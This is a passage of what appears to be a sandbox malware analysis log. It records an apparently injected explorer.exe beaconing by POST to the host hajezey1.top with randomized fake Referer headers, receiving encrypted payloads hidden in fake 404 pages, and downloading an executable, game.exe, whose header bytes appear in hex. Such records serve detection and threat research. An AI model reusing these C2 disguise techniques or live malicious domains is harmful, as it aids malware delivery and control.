                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  31192.168.2.749788185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:56.939694881 CEST5742OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://mkaqxiicba.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 355
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:57.014889956 CEST5743INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:56 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  32192.168.2.749789185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:57.101701021 CEST5744OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://taupwpt.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 152
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:57.179805994 CEST5745INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:57 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  33192.168.2.749790185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:57.268543959 CEST5746OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://blslkdmyqd.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 362
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:57.346498966 CEST5747INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:57 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 81 f5 97 d4 78 2b 2c 62 98 ed 24 c6 ff c5 d4 d9 49 0a 8a 10 c4 44 b9 97 c4 fa be a8 48 96 9e 9b 55 1a f6 de e8 d0 9b 92 17 7d 69 05 79 4a 09 9f 3c bf 00 62 4b 65 fb 80 ab 5b 87 80 39 cd bb 78 96 64 a4 a4 a2 41 45 e8 03 ff 0e 4d e2 d0 97 23 3b 5e 04 e8 5a 9a 14 7a 59 92 17 7e d6 70 82 ba 4b 96 7e bb ee 1f 38 33 d5 53 6f 27 88 32 e7 ce 85 b9 9b 3b 22 2f d9 3d ff 24 3c 78 92 93 78 f9 7e 21 86 a5 ec 34
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RYyM]O_[3_JTO))gxr?|^c[FXB$H)t|;fKMXKw[Ge)29E"|ay6N}o7=Up,Kk"HI?m|6NI^LdU[0z_$U5=PoV`GZdQJVTq5dIvy'$X9:-C'GrPmR`#>[qJ8-,sqK0Z"?+Qz`KJMQAd'\#&Q#2YBA@=C/fGB%4VF>"7"~K6*!?eti6'NGc:HNDZOJW%bJ}Tzl9\@d=V:"}bP1&@N!;KnGAcWJ`_ng";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59x+,b$IDHU}iyJ<bKe[9xdAEM#;^ZzY~pK~83So'2;"/=$<xx~!4


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  34192.168.2.749791185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:59.928647041 CEST6107OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://chucxho.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 365
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:00.007153034 CEST6108INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:59 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  35192.168.2.749792185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:00.368861914 CEST6109OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://futucrxk.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 136
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:00.448647976 CEST6109INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:00 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 29I:82OUcScS0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  36192.168.2.749793185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:00.549640894 CEST6110OUTGET /game.exe HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: sysaheu90.top
                                                  Oct 29, 2021 20:30:00.702553034 CEST6111INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:30:00 GMT
                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                  Last-Modified: Fri, 29 Oct 2021 18:29:02 GMT
                                                  ETag: "92800-5cf820058192d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 600064
                                                  Connection: close
                                                  Content-Type: application/octet-stream
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 29 52 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 50 ac 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 1b 9f 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 aa 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 30 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 a5 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 69 74 6f 00 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CtwCtwCtw,ntw,atw,<twJDtwCtv<tw,Btw,Btw,BtwRichCtwPEL)R_pP@xP@w?w00(@.text `.dataio@.vito0w@.rsrc?@w@@@.reloc"w$@B


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  37192.168.2.749796185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:05.129215956 CEST8127OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://iyxlcdj.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 274
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:05.210537910 CEST8128INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:05 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  38192.168.2.749797185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:05.370523930 CEST8129OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ayllaycsn.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 183
                                                  Host: hajezey1.top
